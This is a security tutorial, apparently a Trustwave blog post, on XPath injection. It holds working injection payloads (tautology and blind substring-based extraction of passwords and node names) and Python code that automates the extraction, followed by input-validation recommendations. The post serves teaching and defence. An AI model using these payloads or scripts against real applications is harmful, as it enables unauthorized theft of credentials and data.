Trustwave Government Solutions Attains StateRAMP Authorization. Learn More

Be Off the Beaten XPath, Go Blind

XPath (XML Path Language) is a language used to query XML documents in order to extract data. XML files are commonly used to store information on the server, particularly configuration settings. Some small applications keep small amounts of data in XML files to avoid deploying a full database. In that case the stored data is usually not very sensitive, but it becomes more interesting when the application uses XML documents to store configuration data such as user settings. When user-supplied input is used directly to build an XPath query without being validated, it may be possible to inject XPath expressions into the query, in the same way you exploit a SQL injection flaw.

XPath Basics

Let's look at a basic example of how XPath works and how an application can navigate within an XML document to retrieve data. Consider an application that stores information about users in an XML file:

<users>
<user Id="1" FirstName="Chris" LastName="Travis" BirthDay="1990-12-22">
<login>ctravis</login>
<password>my$ecureP@ssw0rd</password>
<role>admin</role>
<email>ctravis@mycompany.com</email>
</user>
<user Id="2" FirstName="John" LastName="Rosewood" BirthDay="1977-03-19">
<login>jrosewood</login>
<password>s3cr3t$</password>
<role>operator</role>
<email>jrosewood@site.com</email>
</user>
<user Id="3" FirstName="Mark" LastName="Borgui" BirthDay="1997-10-03">
<login>mborgui</login>
<password>Ma@rkPa$$</password>
<role>user</role>
<email>mborgui@example.com</email>
</user>
</users>

Using XPath you can retrieve any information from within the document (attributes, node text, comments,...). For instance, to retrieve the email addresses of every user you can use the following query:

//users/user/email/text()

Result:

ctravis@mycompany.com
jrosewood@site.com
mborgui@example.com

To extract the BirthDay attribute value for every user:

//users/user/@BirthDay

Result:

1990-12-22
1977-03-19
1997-10-03

Remember that XPath syntax is case sensitive. This means the attribute "BirthDay" is different from the attribute "birthday".

To extract the BirthDay attribute value of users with the "user" role:

//users/user[role/text()='user']/@BirthDay

Result:

1997-10-03
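To try these queries locally, the sketch below loads the sample document with Python's standard xml.etree.ElementTree module. ElementTree implements only a limited subset of XPath (no text(), no @attribute steps, no and/or), so the paths used here are approximations of the queries above, not the exact expressions; a full XPath 1.0 engine such as lxml accepts the original queries as written.

```python
import xml.etree.ElementTree as ET

# The sample users document shown above.
USERS_XML = """<users>
<user Id="1" FirstName="Chris" LastName="Travis" BirthDay="1990-12-22">
<login>ctravis</login><password>my$ecureP@ssw0rd</password>
<role>admin</role><email>ctravis@mycompany.com</email>
</user>
<user Id="2" FirstName="John" LastName="Rosewood" BirthDay="1977-03-19">
<login>jrosewood</login><password>s3cr3t$</password>
<role>operator</role><email>jrosewood@site.com</email>
</user>
<user Id="3" FirstName="Mark" LastName="Borgui" BirthDay="1997-10-03">
<login>mborgui</login><password>Ma@rkPa$$</password>
<role>user</role><email>mborgui@example.com</email>
</user>
</users>"""

root = ET.fromstring(USERS_XML)  # root is the <users> element itself

# Approximates //users/user/email/text()
emails = [email.text for email in root.findall("user/email")]

# Approximates //users/user/@BirthDay
birthdays = [user.get("BirthDay") for user in root.findall("user")]

# Approximates //users/user[role/text()='user']/@BirthDay
user_birthdays = [user.get("BirthDay") for user in root.findall("user[role='user']")]

# Names are case sensitive: there is no "birthday" attribute, so get() returns None.
lowercase = root.find("user").get("birthday")

print(emails, birthdays, user_birthdays, lowercase, sep="\n")
```

The results match the ones listed above, and the last line shows the case-sensitivity rule in practice.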

Injecting into XPath

Now that we understand how XPath works, let's see how an attacker could inject arbitrary expressions to retrieve information they should not be able to see. Consider a feature that returns the birth date for a given login and role. For example, if the user supplies login=jrosewood and role=operator, the application will build the following XPath query:

//users/user[login/text()='jrosewood' and role/text()='operator']/@BirthDay

Result:

1977-03-19

If the application concatenates the user-supplied data into the XPath query string without any validation, an attacker can send the following values to manipulate the original query:

login=
role=' or 'a'='a

That will result in the following XPath query:

//users/user[login/text()='' and role/text()='' or 'a'='a']/@BirthDay

Result:

1990-12-22
1977-03-19
1997-10-03

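Because "and" takes precedence over "or", the predicate is evaluated as (login/text()='' and role/text()='') or 'a'='a'. The 'a'='a' term is always true, so every <user> element matches and the query returns all the BirthDay entries. Well, not very useful at this point, but let's see how we can extract more data.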
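A minimal Python sketch of the vulnerable pattern: the hypothetical build_birthday_query() helper pastes the two request parameters straight into the query string, as described above. The last lines are only a Python analogue of how the injected predicate is evaluated (Python, like XPath, binds "and" more tightly than "or"); they do not run an XPath engine.

```python
def build_birthday_query(login: str, role: str) -> str:
    # VULNERABLE (hypothetical helper): raw request values are pasted between the quotes.
    return ("//users/user[login/text()='" + login
            + "' and role/text()='" + role + "']/@BirthDay")


normal = build_birthday_query("jrosewood", "operator")
injected = build_birthday_query("", "' or 'a'='a")
print(normal)
print(injected)

# Python analogue of the injected predicate (not an XPath engine): each user is
# tested with (login == '' and role == '') or 'a' == 'a', which is always true.
users = [("ctravis", "admin"), ("jrosewood", "operator"), ("mborgui", "user")]
matches = [login for login, role in users if (login == "" and role == "") or "a" == "a"]
print(matches)
```

The two printed queries are exactly the normal and injected queries shown above, and every login ends up in matches.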

As in SQL, XPath has a substring() function that can be used to extract a subset of characters from a string. For instance, the following values test whether the first character of John Rosewood's password is 'A':

login=jrosewood
role=operator' and substring(password/text(),1,1)='A' and 'a'='a

The resulting XPath query is now:

//users/user[login/text()='jrosewood' and role/text()='operator' and substring(password/text(),1,1)='A' and 'a'='a']/@BirthDay

This should not return anything, because the substring() term of the AND sequence is false (the first character is not 'A'). If we test for the letter 's' instead, the query returns his BirthDay date, meaning the first character is 's'. Using this technique we can extract the full password by retrieving each character one by one:

role=operator' and substring(password/text(),2,1)='3' and 'a'='a
role=operator' and substring(password/text(),3,1)='c' and 'a'='a
role=operator' and substring(password/text(),4,1)='r' and 'a'='a
...
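The character-by-character loop can be sketched in Python as follows. The oracle argument is a hypothetical callable (not part of the article) that sends the request with login=jrosewood and the given role value, and returns True when a BirthDay date comes back; the candidate character set is also an assumption.

```python
import string
from typing import Callable

# Candidate characters (an assumption). The single quote is excluded because it
# would close the quoted literal in the payload; whitespace is not tried either.
CHARSET = "".join(
    c for c in string.ascii_letters + string.digits + string.punctuation if c != "'"
)


def substring_payload(expr: str, pos: int, ch: str) -> str:
    """Role value that is true only if character `pos` of `expr` equals `ch`."""
    return f"operator' and substring({expr},{pos},1)='{ch}' and 'a'='a"


def extract_string(oracle: Callable[[str], bool], expr: str, max_len: int = 64) -> str:
    """Recover the string value of the XPath expression `expr`, one character at a time.

    `oracle` is hypothetical: it sends the request with login=jrosewood and the
    given role value, and returns True when the response contains a BirthDay.
    """
    recovered = ""
    for pos in range(1, max_len + 1):  # XPath substring() positions start at 1
        for ch in CHARSET:
            if oracle(substring_payload(expr, pos, ch)):
                recovered += ch
                break
        else:
            # No candidate matched: past the end of the string (or an untried character).
            break
    return recovered
```

Calling extract_string(oracle, "password/text()") would walk through the payloads listed above. Because expr is just an XPath string expression, the same loop also works for node names, such as the name() expressions used in the blind technique.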

Well, but this means you already know the structure of the XML document, right? Not an issue: with XPath it is also possible to retrieve tag and attribute names.

Going blind

In a situation where no information about the XML document structure is known, XPath can still be used to extract data. For instance, to retrieve the root tag name, the following query can be used:

name(//*)

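Called without an argument, the name() function returns the name of the current node; given a node-set, it returns the name of the first node of that set in document order. Since the first element selected by //* is the root element (an XML document can only have one), this returns the root tag name. We can now extract the full name the same way we saw before: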

role=operator' and substring(name(//*),1,1)='u' and 'a'='a
role=operator' and substring(name(//*),2,1)='s' and 'a'='a
role=operator' and substring(name(//*),3,1)='e' and 'a'='a
...

To retrieve the name of an attribute, the following query could be used:

name(//users/user[position()=1]/@*[1])

This one needs a bit more explanation. It first navigates to the first <user> element under <users> and then retrieves the name of its first attribute. The position() function returns the index position of the current node (we want the first one, so [position()=1] is equivalent to the shorthand [1]). As you may have noticed, there is a handy way to select an attribute by its index position: @*[index]. Here, @*[1] means the first attribute. Note that XPath 1.0 leaves the relative order of attribute nodes implementation-dependent, although in practice many implementations follow the order of the source file. Let's use this with our attack payload:

role=operator' and substring(name(//users/user[position()=1]/@*[1]),1,1)='I' and 'a'='a
role=operator' and substring(name(//users/user[position()=1]/@*[1]),2,1)='d' and 'a'='a

Other useful functions can also be used:

  • count(): returns the number of nodes in a node-set (useful to automate the extraction and to know how many position() values to iterate over). For example, to check the number of <user> elements:

    role=operator' and count(//users/user)=3 and 'a'='a

  • string-length(): returns the length of a string (useful to know how many characters to extract with substring()). For example, to check the length of the name of the first attribute of the first <user> node:

    role=operator' and string-length(name(//users/user[position()=1]/@*[1]))=2 and 'a'='a
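The numeric checks above can be automated with a loop that tries each candidate value until the application returns a result. This sketch assumes a hypothetical oracle(role_value) callable that sends the request with login=jrosewood and returns True when a BirthDay comes back; number_payload(), find_number() and attr_name_expr() are illustrative helpers, not part of the article.

```python
from typing import Callable, Optional


def number_payload(expr: str, n: int) -> str:
    """Role value that is true only when the numeric XPath expression equals n."""
    return f"operator' and {expr}={n} and 'a'='a"


def attr_name_expr(user_pos: int, attr_pos: int) -> str:
    """Hypothetical helper: name of attribute #attr_pos of <user> #user_pos."""
    return f"name(//users/user[position()={user_pos}]/@*[{attr_pos}])"


def find_number(oracle: Callable[[str], bool], expr: str, upper: int = 100) -> Optional[int]:
    """Linear search: try 0..upper until the (hypothetical) oracle confirms expr = n."""
    for n in range(upper + 1):
        if oracle(number_payload(expr, n)):
            return n
    return None  # value is larger than `upper`, or the expression is not numeric
```

For example, find_number(oracle, "count(//users/user)") tests the count() payload above, and find_number(oracle, "string-length(" + attr_name_expr(1, 1) + ")") tests the string-length() payload. The linear search mirrors the equality tests used in the article; since XPath also supports < and > on numbers, a binary search would need fewer requests for large values.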

Recommendations

Unlike SQL, whose dialects vary between database vendors, XPath is a standard language, which means the same attack string can be used against any implementation. Also, unlike database objects, whose access can be restricted through permissions, there is no way to restrict access to parts of an XML document: once the application is authorized to read an XML file, it can access any data within it.

To protect the application against XPath Injection attacks, every user-supplied input must be validated before being used in an XPath query. Unlike SQL, XPath has no standard equivalent of parameterized queries, although some libraries let the application bind XPath variables (such as $login) instead of concatenating strings. The best way is to use "Exact Match" validation, where inputs are compared to a list of known good values (e.g. states or zip codes). If that is not possible, use "White List" validation to accept only known good characters. Basically, only alphanumeric characters should be authorized. At a minimum, the following special characters must be rejected:

/ ( ) , = ' " [ ] * : and all whitespace

Remember to always reject the input, sending a message back to the user that specifies the correct format. Never try to sanitize or substitute the unwanted characters.
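A sketch of the two validation strategies above, assuming the known good roles are admin, operator and user (taken from the sample document) and that logins are 1 to 32 ASCII letters or digits (an assumed format). Both hypothetical functions reject bad input with a message describing the expected format instead of trying to clean it up.

```python
import re

# Known good values (assumed from the sample document).
ALLOWED_ROLES = frozenset({"admin", "operator", "user"})
# Assumed login format: 1 to 32 ASCII letters or digits, nothing else.
LOGIN_PATTERN = re.compile(r"[A-Za-z0-9]{1,32}")


def validate_role(role: str) -> str:
    """Exact Match validation: accept only values from the known good list."""
    if role not in ALLOWED_ROLES:
        raise ValueError("role must be one of: " + ", ".join(sorted(ALLOWED_ROLES)))
    return role


def validate_login(login: str) -> str:
    """White List validation: reject (never sanitize) anything but alphanumerics."""
    if not LOGIN_PATTERN.fullmatch(login):
        raise ValueError("login must be 1 to 32 letters or digits")
    return login
```

fullmatch() is used so that the whole value must match the pattern, and the explicit [A-Za-z0-9] class avoids \w, which would also accept underscores and non-ASCII letters.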

ABOUT TRUSTWAVE

Trustwave is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience.
